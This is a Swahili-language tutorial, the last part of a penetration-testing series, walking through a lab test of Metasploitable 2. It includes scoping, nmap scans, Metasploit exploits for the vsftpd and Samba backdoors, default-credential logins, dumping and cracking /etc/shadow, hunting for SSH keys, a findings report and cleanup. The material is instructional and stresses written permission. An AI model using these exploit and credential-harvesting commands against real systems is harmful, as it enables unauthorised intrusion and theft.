Njia ya Hacker: Mfululizo wa Sehemu 5
Sehemu ya 1: Utangulizi → Sehemu ya 2: Umahiri wa Flipper → Sehemu ya 3: Misingi ya Kali → Sehemu ya 4: Unyonyaji → Sehemu ya 5: Ukaguzi Kamili
Ulianza mfululizo huu ukijiuliza hackers wanafanya nini kweli kweli. Ulijifunza kwamba si kuhusu hoodie na maandishi ya kijani kwenye skrini. Ni utatuzi wa matatizo kwa mpangilio. Umeclone beji, umechora ramani za mitandao, umenasa handshake, na umepata shell kwenye mashine zenye udhaifu.
Sasa tunaunganisha yote pamoja. Makala hii inakuongoza kupitia mtihani kamili wa kupenya dhidi ya shabaha ya kubuni. Kila awamu, kila uamuzi, kila ugunduzi, kimeandikwa hasa kama mtaalamu angefanya.
Hali
Mteja: Initech Labs (kampuni ndogo ya teknolojia ya kubuni)
Wigo: Mtihani wa kupenya mtandao wa ndani
Lengo: Kutambua udhaifu na kuonyesha athari inayoweza kutokea kwa biashara
Shabaha yako: Mtandao wako wa maabara (Kali + Metasploitable 2 + VM nyingine yoyote uliyoweka)
Chukua kahawa yako. Hii itakuwa ya kufurahisha.
Awamu ya 1: Maandalizi ya Kabla
Kabla ya kugusa kibodi, wataalam wa kupenya wanashughulikia upande wa biashara. Ruka hii, na wewe si mtaalamu wa kupenya. Wewe ni mtu anayetenda uhalifu tu.
Simu ya Wigo
Katika kazi halisi, ungekuwa na simu na mteja kuelewa:
- Nini kiko ndani ya wigo? Mitandao ipi, masafa ya IP, programu?
- Nini kiko nje ya wigo? Mifumo ya uzalishaji? Huduma za wahusika wengine?
- Dirisha la majaribio? Lini unaweza kujaribu? Masaa ya kazi tu?
- Mawasiliano? Unawasiliana na nani kama kitu kitavunjika?
- Malengo? Tiketi ya utiifu au uboreshaji halisi wa usalama?
Kwa Maabara Yako
Wigo: Mtandao wako wa maabara ulio peke yake tu. Nje ya wigo: Kila kitu kingine duniani. Dirisha la majaribio: Wakati wowote utakao. Lengo: Kujifunza kwa vitendo.
Sheria za Ushirikiano
Miradi halisi ina sheria zilizoandikwa. Hivi ndivyo kawaida zinavyoshughulikia:
- Barua ya idhini - Hati iliyosainiwa inayothibitisha una ruhusa
- Taratibu za kupandisha - Nini cha kufanya ukipata kitu muhimu
- Ushughulikiaji wa data - Jinsi ya kushughulikia data nyeti unayokutana nayo
- Mahitaji ya kusafisha - Ondoa zana zote na milango ya nyuma unapomaliza
- Ratiba ya kuripoti - Ripoti ya mwisho inapaswa kuwa tayari lini?
Daima Pata Ruhusa Iliyoandikwa
Hata kwa majaribio ya "kirafiki" kwenye mtandao wa rafiki yako. Barua pepe iliyosainiwa inayosema "una ruhusa ya kujaribu mtandao wangu kuanzia TAREHE hadi TAREHE" inaweza kuwa tofauti kati ya uzoefu wa kujifunza na hatia ya jinai. Chukulia hili kwa uzito.
Awamu ya 2: Upelelezi
Wakati wa kujifunza kila kitu kuhusu shabaha. Katika mradi halisi, hii ingejumuisha OSINT (akili ya vyanzo vya wazi): utafutaji wa Google, profaili za LinkedIn, tovuti za kampuni, rekodi za DNS. Kwa maabara yetu, tunaruka moja kwa moja kwa upelelezi hai.
Hatua ya 1: Ugunduzi wa Mtandao
Swali la kwanza: Kuna nini kwenye mtandao huu?
bash# Tafuta masafa ya mtandao wako
ip a | grep inet
# Tafuta kitu kama: inet 192.168.56.100/24
# Gundua wenyeji wote walio hai
sudo nmap -sn 192.168.56.0/24 -oA discovery
# Matokeo (mfano):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).Andika kila kitu. Tengeneza kumbukumbu kama hii:
text# Initech Labs - Ugunduzi wa Mtandao
# Tarehe: 2026-03-08
# Mjaribu: Jina Lako
192.168.56.1 - Lango/Ruta
192.168.56.101 - Haijulikani (ya kuchunguza)
192.168.56.102 - Haijulikani (ya kuchunguza)Hatua ya 2: Skani ya Bandari
Sasa tunachimba zaidi. Ni huduma zipi zinazoendesha?
bash# Skani kamili ya bandari na ugunduzi wa huduma
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# Hii inachukua muda. Kwa matokeo ya haraka wakati wa kujifunza:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101Kwenye Metasploitable 2, utaona hazina:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...Wazi kiasi gani. Tuendelee kusasisha kumbukumbu zetu:
text192.168.56.101 - Seva ya Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # Mlango wa nyuma unaojulikana!
- SSH (22): OpenSSH 4.7p1 # Ya kale sana
- Telnet (23): Hai # Kwa nini hii ipo mwaka 2026?
- HTTP (80): Apache 2.2.8 # Programu za wavuti za kujaribu
- SMB (139/445): Samba 3.X # Mgodi wa dhahabu unaowezekana
- MySQL (3306): 5.0.51a # Ufikiaji wa hifadhidata?
- PostgreSQL (5432): Hai # Hifadhidata nyingineHatua ya 3: Utambuzi wa Udhaifu
Wakati wa kuona ni nini kinachoweza kunyonywa kweli.
bash# Endesha skripti za udhaifu
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# Angalia huduma maalum katika Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2Mlango wa nyuma wa vsftpd 2.3.4 unajitokeza mara moja. Hiyo ni shell iliyohakikishwa. Lakini mtaalamu mzuri wa kupenya hasimami kwenye ugunduzi wa kwanza. Unakumbuka kila kitu.
Awamu ya 3: Unyonyaji
Hapa ndipo mambo yanakuwa ya kusisimua. Tuna njia nyingi zinazowezekana za kuingia. Hebu tuzifanyie kazi kwa mpangilio.
Vekta ya Shambulio 1: Mlango wa Nyuma wa FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)Ugunduzi umeandikwa: Shell ya root imepatikana kupitia mlango wa nyuma wa FTP. Muda kutoka skani ya kwanza hadi kuathiriwa kamili: takriban dakika 10.
Lakini hatusimami hapa. Tunaweza kuingia wapi tena?
Vekta ya Shambulio 2: Samba
bash# Peleka kikao cha sasa nyuma
background
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootShell nyingine ya root kupitia vekta tofauti. Hiyo ni njia mbili huru za kuathiri kamili.
Vekta ya Shambulio 3: Programu za Wavuti
Hebu tuangalie kinachoendesha kwenye bandari 80.
bash# Orodhesha saraka za wavuti
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# Matokeo:
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
# Endesha nikto kwa ugunduzi zaidi
nikto -h http://192.168.56.101phpMyAdmin na vithibitisho vya msingi? Tuangalie:
text# Jaribu vithibitisho vya kawaida
Username: root
Password: (tupu)
# Ufikiaji umekubaliwa!Ufikiaji wa msimamizi wa hifadhidata bila nywila. Kutoka hapa, tunaweza kutoa data zote, kubadilisha rekodi, au kutumia operesheni za faili za MySQL kuandika web shell.
Vekta ya Shambulio 4: Vithibitisho Dhaifu vya SSH
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'Vithibitisho dhaifu vinatoa ufikiaji wa SSH. Si root, lakini tutashughulikia hilo katika hatua ya baada ya unyonyaji.
Awamu ya 4: Baada ya Unyonyaji
Tuna ufikiaji. Sasa nini? Mtihani halisi wa kupenya unaonyesha athari kwa biashara. Mshambuliaji anaweza KUFANYA nini kweli na ufikiaji huu?
Uvunaji wa Vithibitisho
bash# Kutoka shell yetu ya root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
# Hifadhi kwa kuvunja nje ya mtandao
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
# Kwenye Kali, vunja
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtUpelelezi wa Mtandao (Kutoka Ndani)
bash# Mitandao gani mingine mashine hii inaweza kufikia?
ifconfig
route -n
cat /etc/hosts
arp -a
# Nini kinaunganishwa kwenye mashine hii?
netstat -tulpn
ss -tulpn
# Tafuta funguo za SSH (kwa harakati za kando)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullUgunduzi wa Data Nyeti
bash# Tafuta faili za kuvutia
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
# Angalia maeneo ya kawaida ya usanidi
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
# Uhesabuji wa hifadhidata
mysql -u root -p # Jaribu nywila tupu
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;Kupandisha Mamlaka (kutoka msfadmin)
Kumbuka kuingia kwa SSH kama msfadmin? Hebu tupandishe hadi root kwa kutumia tulichojifunza katika Sehemu ya 4.
bash# Ingia kwa SSH kama msfadmin
ssh [email protected]
# Angalia ruhusa za sudo
sudo -l
# (Matokeo yanatofautiana, lakini tuangalie vekta nyingine)
# Tafuta programu za SUID
find / -perm -4000 2>/dev/null
# Tafuta skripti zinazoweza kuandikwa zinazoendeshwa na root
cat /etc/crontab
# Pakia na endesha LinPEAS kwa ukaguzi kamili
# (Katika hali halisi, tayari imeshughulikiwa katika Sehemu ya 4)Awamu ya 5: Nyaraka na Matokeo
Mtihani hauna maana bila ripoti. Hii ndiyo inayotenganisha wataalamu na wanaoiga tu. Unahitaji kueleza ulichopata, kwa nini ni muhimu, na jinsi ya kurekebisha.
Muhtasari wa Matokeo
Hivi ndivyo tulivyopata katika mtandao wa "Initech Labs", imeandaliwa kama inavyoonekana katika ripoti halisi:
MUHIMU: Mlango wa Nyuma wa Huduma ya FTP (CVE-2011-2523)
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Utekelezaji wa msimbo wa mbali bila uthibitishaji kama root
Ushahidi: Shell kamili ya root imepatikana chini ya sekunde 60
Mapendekezo: Sasisha vsftpd mara moja hadi toleo la sasa au zima huduma ya FTP kabisa.
MUHIMU: Utekelezaji wa Msimbo wa Mbali kupitia Samba
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Utekelezaji wa msimbo wa mbali bila uthibitishaji kama root
Ushahidi: Shell kamili ya root imepatikana kupitia exploit ya usermap_script
Mapendekezo: Sasisha Samba hadi toleo la sasa. Zuia ufikiaji wa SMB kwa mifumo muhimu tu.
JUU: Ufikiaji wa MySQL Root Bila Nywila
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Kuathiriwa kamili kwa hifadhidata, wizi wa data, uwekaji wa web shell
Ushahidi: Imeingia kama root na nywila tupu kupitia phpMyAdmin
Mapendekezo: Weka nywila imara ya root. Zuia ufikiaji wa phpMyAdmin. Fikiria kuondoa phpMyAdmin kabisa.
JUU: Vithibitisho Dhaifu vya SSH
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Ufikiaji uliothibitishwa unaoongoza kwa kupandisha mamlaka
Ushahidi: msfadmin:msfadmin imethibitishwa kwa mafanikio
Mapendekezo: Tekeleza sera ya nywila imara. Tekeleza uthibitishaji wa ufunguo wa SSH. Fikiria fail2ban.
WASTANI: Huduma ya Telnet Imewashwa
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Vithibitisho vinatumwa kwa maandishi wazi
Ushahidi: Bandari 23 wazi na inakubali muunganisho
Mapendekezo: Zima Telnet. Tumia SSH kwa usimamizi wote wa mbali.
CHINI: Ukurasa wa phpinfo() Ulio Wazi
Mfumo Ulioathiriwa: 192.168.56.101
Hatari: Ufichuaji wa taarifa unasaidia mashambulizi zaidi
Ushahidi: http://192.168.56.101/phpinfo unapatikana bila uthibitishaji
Mapendekezo: Ondoa au zuia ufikiaji wa kurasa za phpinfo.
Muhtasari wa Utendaji
Hii ndiyo watendaji wanaisoma kweli. Iweke fupi, yenye athari, na bila istilahi:
Muhtasari wa Utendaji
Wakati wa mtihani wa kupenya mtandao wa ndani wa Initech Labs, timu ya usalama ilipata udhibiti kamili wa kiutawala wa seva kuu ndani ya dakika 10 tangu kuanza kwa tathmini.
Matokeo Muhimu:
- Udhaifu 2 muhimu unaoruhusu kuchukua udhibiti wa mbali mara moja
- Masuala 2 ya hatari ya juu yanayofichua hifadhidata na vithibitisho vya watumiaji
- Matokeo mengi ya wastani na ya chini yanayoonyesha mapungufu ya kimfumo ya usalama
Hitimisho: Mshambuliaji mwenye ujuzi wa msingi anaweza kuathiri mfumo huu kikamilifu ndani ya dakika. Kurekebisha mara moja kunahitajika kwa matokeo yote muhimu na ya juu. Tathmini ya ufuatiliaji inapendekezwa baada ya marekebisho kutekelezwa.
Awamu ya 6: Usafishaji na Kufunga
Mtaalamu wa kupenya anaiacha mazingira hasa kama alivyoipata.
bash# Andika vikao vyote
msf6 > sessions -l
# Maliza vikao vyote
msf6 > sessions -K
# Kwenye shabaha (ikiwa umetengeneza faili yoyote):
rm /tmp/linpeas.sh
rm /tmp/*.txt
# Ondoa watumiaji wowote uliowatengeneza
userdel testuser
# Ondoa funguo zozote za SSH ulizoweka
rm /home/*/.ssh/authorized_keys
# Andika kila kitu ulichoondoaKatika mradi halisi, pia ungefanya:
- Ondoa zana zote zilizopakiwa wakati wa majaribio
- Andika mabadiliko yoyote yaliyofanywa kwenye mazingira
- Toa hashi/checksums za data yoyote uliyoitoa
- Futa kwa usalama data zote za mteja baada ya kuwasilisha ripoti
Orodha Kamili ya Mbinu
Hii ni mchakato wako unaoweza kutumika tena kwa mtihani wowote wa kupenya:
Mbinu ya Mtihani wa Kupenya
- Maandalizi ya Kabla
- Fafanua wigo na sheria za ushirikiano
- Pata idhini iliyoandikwa
- Anzisha njia za mawasiliano
- Weka mazingira yako ya majaribio
- Upelelezi
- Ugunduzi wa mtandao (uhesabuji wa wenyeji)
- Skani ya bandari na utambuzi wa huduma
- Skani ya udhaifu
- Uhesabuji wa programu za wavuti
- Andika kila kitu
- Unyonyaji
- Thibitisha udhaifu (usiamini skana kipofu)
- Nyonya udhaifu uliothibitishwa
- Andika kila kuathiriwa kwa mafanikio
- Nasa ushahidi (picha za skrini, kumbukumbu)
- Baada ya Unyonyaji
- Hesabu mfumo ulioathiriwa
- Vuna vithibitisho
- Tambua data nyeti
- Jaribu kupandisha mamlaka
- Tafuta fursa za harakati za kando
- Kuripoti
- Andika muhtasari wa utendaji (athari kwa biashara)
- Andika matokeo yote na ushahidi
- Toa mapendekezo ya kurekebisha
- Jumuisha maelezo ya kiufundi kwa timu za IT
- Usafishaji
- Ondoa zana na mabaki yote
- Maliza vikao na milango ya nyuma yote
- Andika mabadiliko yoyote ya mazingira
- Shughulikia data ya mteja kwa usalama
Kinachofuata: Njia Yako Mbele
Umemaliza Njia ya Hacker. Umetoka "hacking ina maana gani hata" hadi kufanya mtihani kamili wa kupenya. Hiyo ni ya kuvutia kweli kweli.
Lakini hii ni mwanzo tu. Hivi ndivyo pa kwenda baadaye:
Majukwaa ya Mazoezi
- Hack The Box - Mashine za kweli za kufanya mazoezi. Anza na "Easy" zilizostaafu.
- TryHackMe - Njia za kujifunza zilizoongozwa. Nzuri kwa maendeleo yaliyopangwa.
- VulnHub - VM za bure zenye udhaifu za kupakua na kufanya mazoezi ndani ya nyumba.
- PentesterLab - Inalenga usalama wa programu za wavuti.
Vyeti (Ikiwa Unavitaka)
- eJPT (eLearnSecurity Junior Penetration Tester) - Hatua nzuri ya kuanzia, mtihani wa vitendo
- OSCP (Offensive Security Certified Professional) - Kiwango cha tasnia, kigumu lakini kinaheshimiwa
- PNPT (Practical Network Penetration Tester) - Ya kisasa, ya vitendo, inajumuisha uandishi wa ripoti
- CEH (Certified Ethical Hacker) - Tiketi kwa kazi za makampuni, chini ya vitendo
Utaalamu
- Usalama wa Programu za Wavuti - OWASP, Burp Suite, SQL injection, XSS
- Active Directory - Mazingira mengi ya makampuni yanategemea hii
- Usalama wa Wingu - Kupenya AWS, Azure, GCP
- Usalama wa Simu - Majaribio ya programu za Android/iOS
- Red Teaming - Uigaji kamili wa adui, kimwili + kidijitali
- Uhandisi wa Nyuma - Uchambuzi wa programu hasidi, uendelezaji wa exploit
Jenga Maabara Yako ya Nyumbani
Wataalam bora wa kupenya wana maabara za nyumbani zilizopangwa vizuri. Anza rahisi na upanue:
- Ongeza Windows Server na Active Directory
- Weka kidhibiti cha kikoa
- Weka programu za wavuti zenye udhaifu (DVWA, bWAPP, WebGoat)
- Jenga mtandao wenye sehemu nyingi
- Ongeza HoneyAegis kuona mashambulizi kutoka mtazamo wa mlinzi
Njia ya Hacker: Imekamilika
Umefanikiwa. Sehemu zote tano, kutoka udadisi hadi uwezo.
Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Unyonyaji Sehemu ya 5: Ukaguzi Kamili
Mfululizo Umekamilika - Safari Yako
Sehemu ya 1: Ulijifunza hacking ni nini kweli na ukapata ushindi wako wa kwanza na Flipper Zero
Sehemu ya 2: Ulivijua vyote vya itifaki za Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO
Sehemu ya 3: Ulijenga maabara yako ya Kali, ukajifunza nmap, na ukanasa WiFi handshake
Sehemu ya 4: Ulivijua Metasploit, unyonyaji, kupandisha mamlaka, na pivoting
Sehemu ya 5: Uliunganisha yote kuwa mbinu kamili ya mtihani wa kupenya
Usalama si mwisho wa safari. Ni mazoezi. Zana zitabadilika, udhaifu utabadilika, lakini mbinu inabaki ile ile. Uliza maswali kuhusu kila kitu. Andika kila kitu. Kamwe usisimame kujifunza.
Karibu upande mwingine.
- Lee